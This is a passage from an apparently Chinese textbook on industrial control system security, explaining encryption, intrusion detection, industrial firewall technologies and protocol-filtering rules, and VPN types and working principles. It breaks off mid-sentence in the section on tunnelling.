对称密钥编码需要将明码文本转换成密码文本,并且在加密和解密过程中均用同一把 密钥。 目前常见的对称密钥算法有三重数据加密标准(3DES) 和高级加密标准(AES) 。AES 常见的有AES128 、AES192 或 AES256。 2. 公钥编码与密钥分配技术 与对称密钥编码不同的是,公钥编码使用一对不同且有关联的密钥(也称公私钥 对)。 这类公钥鉴别通常部署在传输层安全(如 SSL) 、虚拟公网技术(如IPsec) 等。 3. 虚拟专用网络技术 虚拟专用网络 (VPN) 技术是一种采用加密、认证等安全机制,在公共网络基础设施 上建立安全、独占、自治的逻辑网络技术。它不仅可以保护网络的边界安全,同时也是一 种网络互联的方式。 目前,SSLVPN 已广泛应用于控制系统。 有关虚拟专用网络 (VPN) 技术的详细分析,见第3.3节。 3.1.4 管理、审计、测量、监控和检测技术 管理、审计、测量、监控和检测技术包括日志审核工具、病毒与恶意代码检测系统、 入侵检测与入侵防护技术、漏洞扫描技术、辩论与分析工具。 1. 日志审核工具 日志审核工具是系统管理员管理系统日志的工具,能够发现并记录信息安全事件发生 的迹象、文件及攻击入口等。 目前市场上也出现一些日志审核工具,如大多数操作系统均有维修日志文件等。 2. 病毒与恶意代码检测系统 病毒与恶意代码检测系统是一种主动检测非正常活动的代理机制,通常部署在工作 站、服务器和边界。 3. 入侵检测与入侵防护技术 入侵检测是通过从计算机网络或计算机系统中的若干关键点收集信息并对其进行分析, 从中发现网络或系统中是否有违反安全策略的行为和遭到袭击的迹象的一种安全技术。 入侵防护是一种主动的、智能的入侵检测、防范、阻止系统,其设计旨在预先对入侵 活动和攻击性网络流量进行拦截,避免其造成任何损失,而不是简单地在恶意流量传送时 或传送后才发出警报。 目前,入侵检测与入侵防护技术已在控制系统中开始采用。 4. 漏洞扫描技术 漏洞扫描技术是一种检测系统和网络漏洞的方式,这种方式通常用于企业系统网络遭 到破坏,恶意入侵者进入控制系统时进行检测。 漏洞扫描技术通常由漏洞库、扫描引擎、本地管理权限代理和报告机制组成。 由于工业控制系统漏洞库比较有限,因此其漏洞扫描技术应用并不多。 5. 辩论与分析工具 辩论与分析工具用于基本的网络活动,分析非正常的网络流量,以帮助信息安全研究 人员和控制系统管理员的工作。 3.1.5 物理安全控制技术 物理安全控制技术采用一些物理措施,以限制对工业控制系统信息资产的物理访问。 物理安全控制技术包括物理保护、人员安全等。 1. 物理保护 工业控制系统物理保护通常指的是安全防范系统,包括访问监视系统和访问限制系统。 访问监视系统包括摄像机、传感器等识别系统。访问限制系统包括围栏、门、门禁、 保安等。 个四控制系统信息 2. 人员安全 工业控制系统人员安全通常指的是减小人为失误、盗窃、欺骗或有意/无意滥用信息 资产的可能性和风险。 这些人员安全通常包括雇佣方针、公司方针与实践、任用条款等。 3.2 工业防火墙技术 目前,工业控制系统防火墙技术虽然比较成熟,但也存在一些问题,如规则粒度问题 ( 以 Modbus 规则设置为例),防火墙的规则设置应该能够支持具体数据字段的匹配,但规 则深度越深越可能带来防火墙的效率问题,因此,工业控制系统防火墙技术仍在发展中。 下面将详细介绍防火墙的概念、种类和工业防火墙技术。 3.2.1 防火墙的定义 防火墙是由位于两个信任程度不同的网络之间的软件和硬件设备组合而成的 一种装 置,集多种安全机制为一体,是网络之间信息的唯一出入口,能够对两个网络之间的通信 进行控制,通过强制实施统一的安全策略,限制外界用户对内部网络的访问,以及管理内 部用户访问外界网络得到权限,防止对重要信息资源的非法存取和访问,以达到保护系统 安全的目的,是提供信息安全服务,实现网络和信息安全的基础设施。 防火墙也是一种机制,用于控制和监视网络上来往的信息流,其目的在于保护网络上的 设备。流过的信息要与预定义的安全标准或政策进行比较,丢弃不符合政策要求的信息。 实际上,它是一个过滤器,阻止了不必要的网络流量,限制了受保护网络与其他网络(如 互联网或站点网络的另一部分)之间通信的数量和类型。防火墙的示意图如图3- 1所示。 图3-1 防火墙的示意图 3.2.2 工业防火墙技术 工业防火墙在种类方面与一般 IT 防火墙类似,总体上分为数据包过滤、状态包检测 和代理服务器等几大类型。为便于理解工业防火墙技术,参照 OSI 模型图,如图3-2所 示,对数据包过滤技术、状态包检测技术和代理服务技术进行详细分析。 图3- 2 OSI 模 型 图 1. 数据包过滤 (Packet Filtering) 技术 数据包过滤技术在 OSI 的第3层,即在网络层对数据包进行选择,选择的依据是系统 内设置的过滤逻辑,称为访问控制表 (Access Control Table)。通过检查数据流中每个数 据包的源地址、目的地址、所用的端口号、协议状态等因素,或者它们的组合来确定是否 允许该数据包通过。数据包过滤防火墙逻辑简单,价格便宜,易于安装和使用,网络性能 和透明性好。 工业防火墙是基于访问控制技术的包过滤防火墙,它可以保障不同安全区域之间进行 安全通信,通过设置访问控制规则,管理和控制出入不同安全区域的信息流,保障资源在 合法范围内得以有效使用和管理。 目前传统的 IT 防火墙都是按照“白名单”或“黑名单”的方式进行规则设置的,而 工业防火墙大多依据“白名单”设置规则。对于“白名单”,可以设置允许规则,也就是 说只有符合该规则的数据流才能通过,其他任何数据流都可以被视作攻击而过滤掉,这样 就保障了资源的合法使用;而对于“黑名单”,可以设置禁止规则,禁止不合法客户端对 资源的访问。 数据包过滤防火墙可以用于禁止外部不合法用户对内部网络进行访问,也可以用来禁 止某些服务类型,具有过滤效率高、成本低、易于使用等优点。但是,数据包过滤防火墙 还存在诸多不足,主要包括以下几个方面: (1)数据包过滤防火墙是一种基于 IP 地址的认证,不能识别相同 IP 地址的不同用 户,不具备身份认证的功能。数据包过滤判别的条件为数据包包头的部分信息,由于 IPv4 的 不 安 全 性 , 导 致 各 种 条 件 极 有 可 能 被 伪 装 。 (2)数据包过滤防火墙是基于网络层的安全技术,不具备检测通过应用层协议而实施 的 攻 击 。 (3)数据包过滤防火墙的过滤规则表相当复杂,没有很好的测试工具检验其正确性、 冲突性,容易导致漏洞。 (4)对于采用动态或随机分配端口的服务,数据包过滤防火墙很难进行有效认证,如 远程过程调用服务 (RPC)。 因此,数据包过滤防火墙适用于工业控制,早期市场中已普遍使用,但其缺陷也慢慢 显现出来。 2. 状态包检测 (Stateful Packet Inspection) 技术 随着网络应用的增多,用户对包过滤技术提出了更高的要求,主要体现在策略规则的 查找速度及系统的安全性方面,随之出现了状态包检测技术。状态包检测监视每一个有效 连接的状态,并根据这些信息决定网络数据包是否能够通过防火墙。它在协议栈底层截取 数据包,然后分析这些数据包,并且用当前数据包及其状态信息与其前一时刻的数据包及 其状态信息进行比较,得到该数据包的控制信息,从而达到保护网络安全的目的。 状态包检测防火墙采用基于会话连接的状态检测机制,将属于同一连接的所有数据包 作为一个整体的数据流看待,构成动态连接状态表,通过访问控制列表与连接状态表的共 同作用,不仅可以对数据包进行简单的包过滤(也就是对源地址、目标地址和端口号进行 控制),而且可以对状态表中的各个连接状态因素加以识别,检测此次会话连接的每个数 据包是否符合此次会话的状态,能够根据此次会话前面的数据包进行基于历史相关的访问 控制,因此,不需要对此次会话的每个数据包进行规则匹配,只需进行数据包的轨迹状态 检查,从而加快了数据包的处理速度。动态连接状态表中的记录可以是以前的通信信息, 也可以是其他相关应用程序的信息,因此,与传统包过滤防火墙的访问控制列表相比,它 具有更好的性能和安全性。 状态包检测防火墙虽然成本高一点,对管理员的要求复杂一点,但它能提供比数据包 过滤防火墙更高的安全性和更好的性能,因而在工业控制中应用得越来越多。 状态包检测防火墙适用于工业控制,在目前市场中正在推广应用,其优越性也开始 显现。 3. 代理服务 (Proxy Service) 技术 代理服务 (Proxy Service) 又称为链路级网关或TCP 通道 (Circuit Level Gateways or TCP Tunnels),也有人将其归于应用级网关一类。它是针对数据包过滤和应用网关技术存 在的缺点而引入的防火墙技术,其特点是将所有跨越防火墙的网络通信链路分为两段。防 火墙内外计算机系统间应用层的“链接”由两个终止代理服务器上的“链接”实现,外部 计算机的网络链路只能到达代理服务器,起到隔离防火墙内外计算机系统的作用。此外, 代理服务也对过往的数据包进行分析、注册登记,形成报告,当发现被攻击迹象时会向网 络管理员发出警报,并保留攻击痕迹,其具有更好的性能和安全性,但有一定的附加部分 和延时,影响性能。 第3章 工业控制系统信息安全技术与方案部署 因此,代理服务网关防火墙不太适用于工业控制,但也有不计较延时情况的应用。 3.2.3 工业防火墙技术的发展方向 网络安全技术的深入发展使防火墙技术也在不断发展,透明接入技术、分布式防火墙 技术和智能型防火墙技术是目前防火墙技术发展的新方向。 1. 透明接入技术 随着防火墙技术的快速发展,安全性高、操作简便、界面友好的防火墙逐渐成为市 场热点,简化防火墙设置、提高安全性能的透明模式和透明代理成为衡量产品性能的重 要指标。 透明模式最主要的特点就是对用户是透明的 (Transparent), 用户意识不到防火墙的 存在。如果想实现透明模式,防火墙必须在没有 IP 地址的情况下工作,不需要对其设置 IP 地址,用户也不知道防火墙的 IP 地址。防火墙采用了透明模式,用户就不必重新设定 和修改路由,防火墙可以直接安装和放置到网络中使用,如交换机一样,不需要设置 IP 地址。 透明模式防火墙类似于一台网桥(非透明防火墙好比是一台路由器),网络设备(包 括主机、路由器、工作站等)和所有计算机的设备(包括 IP 地址和网关)无须改变,同 时解析所有通过它的数据包,既增加了网络的安全性,又降低了用户管理的复杂程度。 透明模式的原理可以理解为假设A 为内部网络客户机, B 为外部网络服务器, C 为防 火墙。当 A 对 B 有连接请求时,TCP 连接请求被防火墙截取并加以监控,截取后当发现 连接需要使用代理服务器时, A 和 C 之间首先建立连接,然后防火墙建立相应的代理服 务通道与目标 B 建立连接,由此通过代理服务器建立 A 和目标地址 B 的数据传输途径。 从用户的角度看,A 和 B 的连接是直接的,而实际上A 是通过代理服务器C 和 B 建立连 接的;反之,当 B 对 A 有连接请求时,原理相同。由于这些连接过程是自动的,不需要 客户端手工配置代理服务器,用户甚至根本不知道代理服务器的存在,因此,对用户来说 是透明的。 2. 分布式防火墙技术 由于传统防火墙被部署在网络边界,因而称为边界防火墙。边界防火墙在企业内部网 和外部网之间构成一道屏障,负责进行网络存取控制。随着网络安全技术的深入发展,边 界防火墙逐渐暴露出一些弱点,具体表现在以下几个方面。 (1)网络应用受到结构性限制。边界防火墙依赖于物理上的拓扑结构,它从物理上将 网络划分为内部网络和外部网络,从而影响了防火墙在虚拟专用网络 (VPN) 技术上的广 泛应用,因为今天的企业电子商务要求员工、远程办公人员、设备供应商、临时雇员及商 业合作伙伴都能够自由访问企业网络。VPN 技术的应用和普及,使企业网络边界逐渐成 为一个逻辑边界,物理边界变得模糊。 (2)内部安全隐患依然存在。边界防火墙只对企业网络的周边提供保护。这些边界防 火墙会对从外部网络进入企业内部局域网的流量进行过滤和审查,但是它们并不能确保企 业内部网络用户之间的安全访问。 (3)边界防火墙把检查机制集中在网络边界处的单点上,造成网络瓶颈和单点故障 隐患。 基于上述边界防火墙的不足, 一种全新的防火墙概念——分布式防火墙出现,它不仅 能保留边界防火墙的优点,而且能克服前面提到的边界防火墙的不足。 分布式防火墙负责对网络边界、各子网和网络内部各节点之间的安全防护,因此,分 布式防火墙是一个完整的系统,不是单一的产品。根据所需完成的功能,分布式防火墙体 系结构包含如下3个部分: (1)网络防火墙。这部分既可以采用纯软件方式,也可以采用相应的硬件支持,用于 内部网和外部网之间,以及内部网各子网之间的防护,比边界防火墙多了一种用于内部子 网之间的安全防护层。 (2)主机防火墙。主机防火墙同样有软件和硬件两种产品,用于对网络中的服务器和 桌面机进行防护。这点比边界防火墙的安全防护更完善,确保内部网络服务器的安全。 (3)中心管理。这是一个服务器软件,负责总体安全策略的策划、管理、分布及日志 的汇总。这种新防火墙的管理功能是边界防火墙所不具有的,应用这种防火墙进行智能管 理,提高了防火墙的安全防护灵活性,具备可管理性。 分布式防火墙的工作流程如下:首先,由制定防火墙接入控制策略的中心通过编译器 将策略语言描述转换成内部格式,形成策略文件;然后,中心采用系统管理工具把策略文 件分发给各自内部主机,内部主机根据 IP 安全协议和服务器端的策略文件两个方面来判 定是否接受所收到的包。 3. 智能型防火墙技术 传统的包过滤型防火墙与应用代理服务防火墙形式单一,一旦被外来黑客突破,整个 Intranet 就会完全暴露给黑客。因此, 一种组合式结构的智能防火墙是比较好的解决方 案,其结构由内、外部路由器,智能认证服务器,智能主机和堡垒主机组成。内、外部路 由器在 Intranet 和 Internet 之间构筑一个安全子网,称为非军事区 (DMZ) 。 信息服务器、 堡垒主机、Modem 组,以及其他公用服务器布置在 DMZ 网络中,智能认证服务器安放在 Intranet 里。 通常,外部路由器用于防范外部攻击,内部路由器则用于 DMZ 与Intranet 之间的 IP 包过滤等,保护 Intranet 不受 DMZ 和 Internet 的侵害,防止在 Intranet 上广播的数据包流 入 DMZ。 智能型防火墙的工作原理可以理解为按照智能型防火墙中内、外路由器的工作过程, Intranet 主机向 Internet 主机连接时,使用同一个 IP 地址。而Internet 主机向 Intranet 主机 连接时,必须通过网关映射到 Intranet 主机上。它使 Internet 看不到 Intranet 。无论何时, DMZ上堡垒主机中的应用过滤管理程序均可通过安全隧道与Intranet 中的智能认证服务器 进行双向保密通信,智能认证服务器可以通过保密通信修改内、外部路由器的路由表和过滤规则。整个防火墙系统的协调工作主要由专门设计的应用过滤管理程序和智能认证服务 程序来控制执行,并且分别运行在堡垒主机和智能服务器上。 3.2.4 工业防火墙与一般 IT 防火墙的区别 传统包过滤防火墙与一般IT 防火墙的区别主要表现在以下几点: (1)支持基于白名单策略的访问控制,包括网络层和应用层。 (2)工业控制协议过滤,应具备深度包检测功能,支持主流工控协议的格式检查机 制、功能码与寄存器检查机制。 (3)支持动态开放 OPC 协议端口。 (4)防火墙应支持多种工作模式,保证防火墙的区分部署和工作过程,以实现对被防护 系统的最小影响。例如,学习模式:防火墙记录运行过程中经过它的所有策略、资产等信 息,形成白名单策略集;验证模式或测试模式:该模式下防火墙对白名单策略外的行为做 告警,但不拦截;工作模式:该模式为防火墙的正常工作模式,严格按照防护策略进行过 滤等动作保护。 (5)防火墙应具有高可靠性,包括故障自恢复、在一定负荷下72 小时正常运行、无 风扇、支持导轨式或机架式安装等。 为进一步理解工业防火墙与一般IT 防火墙的区别,以多芬诺 (Tofino) 工业防火墙的 应用为例,与一般IT 防火墙做比较。 第3章 工业控制系统信息安全技术与方案部署 3.2.5 工业防火墙具体服务规则 1. 域名解析系统 (DNS) DNS 主要用于域名和 IP 地址之间的翻译。例如, 一个 DNS 能够映射一个域名,如 control.com 和一个 IP 地址。大多数互联网服务依赖 DNS, 但是控制网络很少使用 DNS。 多数情况不允许从控制网发 DNS 请求到公司网,也不允许发 DNS 请求到控制网。从控制 网发 DNS 请求到 DMZ 必须逐项标出地址,推荐使用本地 DNS 或主机文件。 2. 超文本传输协议 (HTTP) HTTP 是在互联网进行 Web 浏览的协议。由于 HTTP 没有固有的安全策略,并且很多 HTTP 应用有漏洞,因此, HTTP 不允许从公司网过渡到控制网。HTTP 代理应在防火墙 配置,阻止所有入站脚本和 Java 应用。因为 HTTP 有安全风险,所以 HTTP 不允许连接 至控制网。若 HTTP 服务确实需要进入控制网,则推荐采用较安全的 HTTP 而不是仅对某 个具体设备。 3. 文件传输协议 (FTP) 和一般的文件传输协议 (TFTP) FTP 和 TFTP 用于设备之间的文件传输。由于无须费力,所以几乎每个平台都会使 用,包括在 SCADA 、DCS 、PLC 和 RTU 中。只是没有一个协议会在开发时考虑安全。对 于FTP, 登录密码没有编码;对于 TFTP, 不需要登录。另外, 一些 FTP 有缓冲区溢出漏 洞。因此所有 TFTP 通信必须禁止,而 FTP 通信仅用于在安全验证和编码通道配置的情形 下进行一段时间的出站。任何时候,只要有可能,均采用较安全的协议,如 SFTP 和 SCP。 4. 用于远程连接服务的标准协议 (Telnet) Telnet 在用户端和主机端之间定义一个互动的、以文本为基础的通信,它主要用于远 程登录和简单的访问有限资源系统的服务,以及对系统安全不限制的访问服务。由于所有 Telnet 程序,包括密码,都没有编码,并且允许远程控制某个设备,因此这种协议存在很 严重的安全风险。从公司网进入控制网的入站 Telnet 必须禁止。出站 Telnet 仅在编码通道 (如 VPN) 允许访问某些设备。 5. 简单邮件传输协议 (SMTP) SMTP 是互联网上主要的邮件传输协议。邮件信息经常带有恶意软件,因此,入站邮 件不允许送至任何控制设备。允许出站 SMTP 从控制网到公司网发送警告信息。 6. 简单网络管理协议 (SNMP) SNMP 用于中央管理控制台与网络设备之间的网络管理服务。尽管 SNMP 对维护网 络特别有用,但它的安全性很差。 7. 分布式组件对象模型 (DCOM) DCOM 是 OPC 和 Profinet 的基本传输协议,其采用远程过程调用 (RPC), 而 RPC 有很多漏洞,基于 DCOM 的 OPC 动态开放很宽的端口(1024~65535),以至于防火墙很 难过滤。这种协议只允许在控制网和 DMZ 之间使用,而在公司网和 DMZ 之间被阻止。 8.SCADA 与工业网络协议 SCADA 和一些工业网络协议,如 Modbus/TCP 、EtherNet/IP 等,对于多数控制设备之间 的通信是很关键的。只是这些协议设计时没有考虑安全性,并且不需要任何验证就可对控制 设备远程发出执行命令,因此,这些协议只允许用于控制网,而不允许过渡到公司网。 3.2.6 关于工业防火墙的问题 本章3.5 节讲述的网络隔离中有工业防火墙争论点,主要是数据历史服务器问题。采 用工业防火墙,还将带来远程支持访问问题和多点广播数据流问题。 1. 数据历史服务器 控制网和公司网共享的服务器,如数据历史服务器和资产管理服务器,会对防火墙的 设计和配置产生影响。如果数据历史服务器放在公司网,那么一些不安全的协议,如 Modbus/TCP 或 DCOM, 则必须穿过防火墙向数据历史服务器汇报而出现在公司网。同 样,如果数据历史服务器放在控制网,那么一些有问题的协议,如 HTTP 或 SQL, 则必 须穿过防火墙向数据历史服务器汇报而出现在控制网。 因此,最好的办法是不用两区系统,采用三区系统,即控制网区、DMZ 和公司网 区。在控制网区收集数据,数据历史服务器放在 DMZ。然而,若很多公司网用户访问数 据历史服务器,则会加重防火墙的负担。这个问题可以采用安装两台服务器来解决: 第 一台放置在控制网收集数据,第二台放置在公司网,镜像第一台服务器,同时支持用户询 问,并做好两台服务器的时间同步。 2. 远程支持访问 用户或供应商通过远程访问进入控制网,需通过验证。 控制组可以在 DMZ 建立远程访问系统,也可以由IT 部门用已有的系统,即从 IT 远 程访问服务器通过防火墙建立连接。 远程支持人员必须采用VPN 技术访问控制设备。VPN 技术可以是 IPsec VPN 中的安 全套接字层 (SSL)VPN 或传输层安全协议 (TLS)VPN。 3. 多点广播数据流 多点广播数据流提高了网络的效率,却带来了防火墙的复杂问题。 与多点广播数据流有关的防火墙问题还有网络地址转移技术 (NAT) 的使用。由于防火墙没有反向映射功能,当收到一个多点广播数据包时,不知该发给哪位用户,安全的做 法是丢弃这个数据包,于是出现多点广播数据流网络地址转移不友好的情况。 3.3 虚拟专用网(VPN) 技术 计算机网络技术的快速发展使得企业规模不断扩大,远程用户、远程办公人员、分支 机构和合作伙伴也越来越多。在这种情况下,用传统的租用线路的方式实现私有网络的互 联会造成很大经济负担。因此,人们开始寻求一种经济、高效、快捷的私有网络互联技 术。虚拟专用网 (Virtual Private Network,VPN) 的出现给当今企业发展所需的网络功能 提供了理想的实现途径。VPN 可以使公司获得使用公用通信网络基础结构所带来的经济 效益,同时获得使用专用的点到点连接所带来的安全性。 3.3.1 虚拟专用网技术概述 1. 虚拟专用网技术的定义 虚拟专用网技术是一种采用加密、认证等安全机制,在公共网络基础设施上建立安 全、独占、自治的逻辑网络技术。它不仅可以保护网络的边界安全,而且是一种网络互联 的方式。 VPN 是通过利用接入服务器、路由器及 VPN 专用设备,采用隧道技术,以及加密、 身份认证等方法,在公用的广域网(包括 Internet 、公用电话网、帧中继网及ATM 等 ) 上 构建的专用网络。在虚拟专用网上,数据通过安全的“加密隧道”在公众网络上传播。 VPN 技术如同在茫茫的广域网中为用户拉出一条专线。对于用户来说,公用网络起到 了“虚拟专用”的效果,用户觉察不到它在利用公用网获得专用网的服务。通过 VPN, 网 络对于每个使用者都是“专用”的。也就是说,VPN 根据使用者的身份和权限,直接将使 用者接入它所应该接触的信息中。这一点是VPN 给用户带来的最明显变化。 VPN 可视为内部网在公众信息网(宽带城域网)上的延伸,通过在宽带城域网中一 个私用通道来创建一个安全的私有连接, VPN 通过这个私用通道将远程用户、分支机 构、业务合作伙伴等机构的内联网连接起来,构成一个扩展的内联网络,其结构示意图如 图3-3所示。 从客观上而言,VPN 就是一种具有私有和专有特点的网络通信环境。它是通过虚拟 的组网技术,而不是构建物理的专用网络的手段来达到的。因此,可以分别从通信环境和 组网技术的角度来定义 VPN。 从通信环境角度而言, VPN 是一种存取受控制的通信环境,其目的在于只允许同一 利益共同体的内部同层实体连接,而 VPN 的构建则是通过对公共通信基础设施的通信介 质进行某种逻辑分割来实现的,其中基础通信介质提供共享性的网络通信服务。 图3-3 VPN 结构示意图 从对组网技术而言,VPN 通过共享通信基础设施为用户提供定制的网络连接服务。 这种连接要求用户共享相同的安全性、优先级服务、可靠性和可管理性策略,在共享的基 础通信设施上采用隧道技术和特殊配置技术仿真点到点的连接。 2. 虚拟专用网技术的优点 与其他网络技术相比,VPN 有如下优点。 1)容易扩展 若企业想扩大 VPN 的容量和覆盖范围,只需与新的 ISP 签合约,建立账户,或者与 原有的 ISP 重签合约,扩大服务范围。在远程办公室增加 VPN 的能力也很简单,通过配 置命令就可以使 Extranet 路由器拥有互联网和 VPN 的功能,路由器还能对工作站自动进 行配置。 2)方便与合作伙伴的联系 以前,如果企业想与合作伙伴联网,则双方的信息技术部门必须协商如何在双方之间 建立租用线路或帧中继线路。自从有了 VPN 之后,这种协商就没有必要了,真正达到了 要连就连、要断就断的目的。 3)完全控制主动权 VPN 可以使企业利用 ISP 的设备和服务,同时完全掌握着对自己网络的控制权。例 如,企业可以把拨号访问交给 ISP 去做,由自己负责用户的查验、访问权、网络地址、安 全性和网络变化管理等重要工作。 4)成本较低 在使用互联网时,通过借助 ISP 来建立 VPN, 可以节省大量通信费用。此外, VPN 可以使企业不需要投入大量人力、物力去安装和维护广域网设备和远程访问设备,这些工 作 都 由ISP 代为完成。 第3章 工业控制系统信息安全技术与方案部署 3.3.2 虚拟专用网的分类 依据不同的标准和观点会有不同的 VPN 分类,各种文献中也出现了种类繁多的分 类。本书着重讨论按 VPN 应用模式和按构建者所采用的安全协议两种分类方法。 1. 按 VPN 应用模式分类 按 VPN 应用模式, VPN 可分为3种类型:远程访问虚拟专用网 (Access VPN)、企 业内部虚拟专用网 (Intranet VPN) 和企业扩展虚拟专用网 (Extranet VPN)。这3种类型 的虚拟专用网分别与传统的远程访问网络、企业内部的 Intranet, 以及企业网和相关合作 伙伴的企业网所构成的 Extranet 相对应。 1)远程访问虚拟专用网(Access VPN) .远程访问虚拟专用网通过公用网络与企业的 Intranet 和互联网建立私有网络连接。在 远程访问虚拟专用网的应用中,利用了二层网络隧道技术在公用网络上建立了 VPN 隧道 来传输私有网络数据。 远程访问虚拟专用网的结构有两种类型: 一种是用户发起的 VPN 连接;另一种是接 入服务器发起的 VPN 连接。 用户发起的 VPN 连接有两种情况: 一种是远程用户通过服务提供点 (POP) 拨入互 联网;另一种是远程用户通过网络隧道协议与企业网建立一条隧道(可加密)连接,从而 可以访问企业网的内部资源。 在这种情况下,用户端必须维护与管理发起隧道连接的有关协议和软件。然而,在接 入服务器为VPN 连接发起方的情况中,用户通过本地号码或免费号码拨号 ISP, 然后ISP 的接入服务器再发起一条隧道连接到用户的企业网。在这种情况下,所建立的 VPN 连接 对远程用户是透明的,构建 VPN 所需的协议及软件均由ISP 负责。 这种 VPN 要对个人用户的身份进行认证(不仅认证 IP 地址),公司就可以知道哪个 用户想访问公司的网络,经认证后决定是否允许该用户对网络资源进行访问,以及可以访 问哪些资源。用户的访问权限表由网络管理员制定,并且要符合公司的安全策略。 2)企业内部虚拟专用网 (Intranet VPN) 利用计算机网络构建虚拟专用网的实质是通过公用网在各个路由器之间建立 VPN 安 全隧道来传输用户的私有网络数据。用于构建这种 VPN 连接的隧道技术有 IPSec 、GRE 等,使用这些技术可以有效、可靠地使用网络资源,从而保证了网络质量。以这种方式连 接而成的网络称为企业内部虚拟专用网,可以把它视为公司网络的扩展。 这种类型的 VPN 的主要任务是保护公司的互联网不被外部入侵,同时保证公司的重 要数据经过互联网时的安全性。 3)企业扩展虚拟专用网(Extranet VPN) 企业扩展虚拟专用网是指利用 VPN 将企业网延伸至合作伙伴与客户,进行信息共 享、交流和服务的网络。 Extranet VPN 是一个由加密、认证和访问控制功能组成的集成系统。安全的 Extranet VPN 要求公司在同它的客户、合作伙伴及在外地的雇员之间经互联网建立端到端的连接 时,必须通过 VPN 代理服务器进行。 通常,公司将 VPN 代理服务器放在一个不能穿透的防火墙隔离层之后,防火墙阻止 所有来历不明的信息传输。经过过滤后的数据通过唯一入口传到 VPN 服务器, VPN 服务 器再根据安全策略进一步过滤。 因合作伙伴与客户分布广泛,这样的Extranet VPN 的建立对于维护来说是非常昂贵的。 2. 按构建者所采用的安全协议分类 按构建者所采用的安全协议分类,每一种安全协议都可以对应一类 VPN 。 目前比较 流行并被广泛采用的主要有IPSec VPN 、MPLS VPN 、L2TP VPN 和 SSLVPN。 1)IPSec VPN IPSec VPN 是目前应用最广泛的VPN 之一。它利用 IPSec 的优势,不仅有效地解决了 利用公共IP 网络互联的问题,而且具有很高的安全性。IPSec 是目前直接采用密码技术的 真正意义上的安全协议,是目前公认的安全协议族。当采用 VPN 技术解决网络安全问题 时,在网络层 IPSec 协议是最佳选择。 2)MPLS VPN 多协议标记交换 (Multi-Protocol Label Switching,MPLS) 的提出是为了提高核心骨 干网中网络点的转发速率,解决其无法适应大规模网络的发展问题。MPLS 通过标记交换 的转发机制,把网络层的转发和数据链路层的交换有机地结合起来,实现了“一次路由, 多次交换”,用标记索引代替目的地址匹配。由于采用固定长度的标记,使得标记索引能 够通过硬件实现,从而大大提高了分组转发效率。 MPLS 是目前较为理想的骨干 IP 网络技术,除了能提高路由器的分组转发性能外, 还有多方面的应用,包括流量工程、QoS 保证。MPLS 在流量工程方面有助于实现负载 均衡,当网络出现故障时能够实现快速路由切换,同时为 IP 网络支持 QoS 提供了一个 新途径。 MPLS 在 IP 网络中的另一个重要应用就是为建立 VPN 提供了有效的手段,通常将在 MPLS 骨干网上利用 MPLS 技术构建的 VPN 称为MPLS VPN 。MPLS VPN 主要用于服务 提供商在它们拥有的 MPLS 骨干网上提供类似于帧中继、ATM 服务的VPN 组网服务。 MPLS VPN 组网具有 MPLS 协议的主要优势: 一是具有良好的可扩展性,主要表现 在 VPN 用户无须对现有设备进行任何设置, VPN 服务提供商只在 PE 路由器维护 VPN 路 由信息,所以在可扩展性方面具有明显优势;二是服务提供商提供 VPN 组网服务时具有 易管理性;三是容易实现 QoS 控制。因此, MPLS VPN的 QoS 机制优于基于传统 IP 网络 的 VPN 技术。 MPLS VPN 也有不足的地方,如不能提供机密性、完整性、访问控制等安全服务,以 及访问灵活性差。 3)L2TP VPN 第二层隧道协议 (Layer2 Tunneling Protocol,L2TP)VPN 是另一个流行的 VPN 形 式,主要用于提供远程移动用户或 VPN 终端通过PSTN 进行远程访问服务拨号 VPN 的构 建。L2TP 也可以解决网络访问服务器 (NAS) 的接入问题,用户不用拨打长途电话,通 过本地拨号,借助 Internet 或服务提供商的 NAS, 就可以实现远程 NAS 的接入。由于 L2TP 的安全性依赖于 PPP 的安全性, PPP 一般没有采用加密等措施,所以从网络安全的 角度来看,L2TP 是缺乏安全机制的。 4)SSL VPN 最近几年来, 一种新兴的 VPN——SSL VPN 技术得到广泛、快速应用,它能提供与 IPSec相近似的安全性。其通过利用安全套接字层协议 (Secure Socket Layer,SSL) 保证 通信的安全,利用代理技术实现数据包的封装处理功能。通常的实现方式是在企业防火墙 后面放置一台 SSL 代理服务器。如果用户希望安全地连接到公司网络上,那么当用户在 浏览器上输入一个 URL 后,连接将被 SSL 代理服务器取得,并验证该用户的身份,然后 SSL 代理服务器将提供一个远程用户与各种不同应用服务器之间的连接。 在 VPN 客户端的部署和管理方面, VPN 相对于IPsec VPN 要容易和方便得多。它的 一个主要局限在于用户访问是基于 Web 服务器的,对于不同的 Web 服务要进行不同的处 理,并且对非 Web 的应用服务只是有限支持,实现起来非常复杂,因而无法保护更多的 应用;而 IPSec VPN 却几乎可以为所有应用提供访问,包括客户-服务器模式和某些传统 应用。SSLVPN 还需要CA 的支持,处理速度相对于IPSec VPN 来说比较慢,安全性也没 有 IPSec VPN 高。 3.3.3 虚拟专用网的工作原理 VPN 连接表面上看是一种专用连接,实际上是在公共网络基础上的连接。它通过使 用被称为“隧道”的技术,建立点对点的连接,实现数据包在公共网络上专用“隧道”内 的传输。 通常, 一个隧道基本上是由隧道启动器、路由网络、隧道交换机和一个或多个隧道终 结器等组成的。来自不同数据源的网络业务经过不同的隧道在相同的体系结构中传输,并 且允许网络协议穿越不兼容的体系结构,还可以区分来自不同数据源的业务,因而可以将 该业务发往指定目的地,同时接受指定的等级服务。 隧道启动和终止可以由许多网络设备和软件来实现。VPN 除了具备常规的防火墙和 地址转移功能外,还应具备数据加密、鉴别和授权功能。 将网络协议封装到 PPP 协议中,或将网络协议直接封装到隧道协议中,创建符合标 准的 VPN 隧道。隧道启动器将隧道协议包封装在 TCP/IP 数据包中,然后通过互联网传 输,另一端隧道终结器的软件打开这些数据包,并将其发送给原来的协议进行常规处理。 3.3.4 虚拟专用网的关键技术 VPN 是由特殊设计的硬件和软件直接通过共享的基于 IP 的网络建立起来的,它以交 换和路由的方式工作。隧道技术把在网络上传送的各种类型的数据包提取出来,按照一定 的规则封装成隧道数据包,然后在网络链路上传输。在 VPN 上传输的隧道数据包经过加 密处理,具有与专用网络相同的安全和管理的功能。 VPN 采用的关键技术主要包括加密技术、安全隧道技术、用户身份认证技术及访问 控制技术。下面将对这些技术进行介绍。 1. 加密技术 发送者在发送数据之前对数据进行加密,当数据到达接收者时由接收者对数据进行解 密,使用的加密算法可以是对称密钥算法,也可以是公共密钥算法等,如 DES 、SDES、 IDEA 、RSA 及 ECC 等。 2. 安全隧道技术 VPN 的核心是安全隧道技术 (Secure 